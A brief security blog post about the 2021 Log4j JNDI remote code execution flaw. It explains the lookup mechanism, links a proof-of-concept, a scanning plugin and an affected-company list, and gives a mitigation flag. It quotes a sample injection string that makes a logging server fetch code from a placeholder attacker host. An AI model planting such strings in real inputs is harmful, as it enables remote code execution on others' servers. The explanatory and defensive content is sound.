Log4j 0-day RCE: Top companies affected

YevhSec1
Dec 10, 2021

--

How it’s work:

  1. We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
  2. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
  3. In the response, a JAVA class is given, which allows you to execute arbitrary code.

PoC: https://github.com/tangxiaofeng7/apache-log4j-poc

Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

What companies affected: https://github.com/YfryTchsGD/Log4jAttackSurface

Temporary fix: JAVA_OPTS = “- Dlog4j.formatMsgNoLookups = true”

--

--

YevhSec1
YevhSec1

Written by YevhSec1

MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera..